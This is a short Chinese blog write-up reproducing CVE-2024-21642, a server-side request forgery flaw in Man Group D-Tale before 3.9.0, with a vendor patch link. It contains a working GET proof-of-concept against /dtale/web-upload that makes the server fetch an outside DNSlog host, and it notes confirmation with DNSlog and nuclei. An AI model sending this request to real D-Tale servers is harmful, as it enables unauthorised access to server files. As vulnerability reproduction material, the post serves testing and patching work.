D-Tale服务器端请求伪造漏洞(CVE-2024-21642)
0x00写在前面
本次测试仅供学习使用,如若非法他用,与本平台和发布者无关,需自行负责!
0x01漏洞介绍
Man Group D-Tale是Man Group公司的一个pandas数据结构的可视化工具。
Man Group D-Tale 3.9.0之前版本存在代码问题漏洞。攻击者利用该漏洞能够访问服务器上的文件。
0x02影响版本
D-Tale < 3.9.0
0x03漏洞复现
1.访问漏洞环境
2.对漏洞进行复现
POC (GET)
漏洞复现
GET /dtale/web-upload?type=csv&url=http://mujjyyvcrp.dgrh3.cn HTTP/1.1
Host: 127.0.0.1
执行payload
测试DNSlog(漏洞存在)
3.nuclei工具测试(漏洞存在)
0x04修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://github.com/man-group/dtale/commit/954f6be1a06ff8629ead2c85c6e3f8e2196b3df2
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果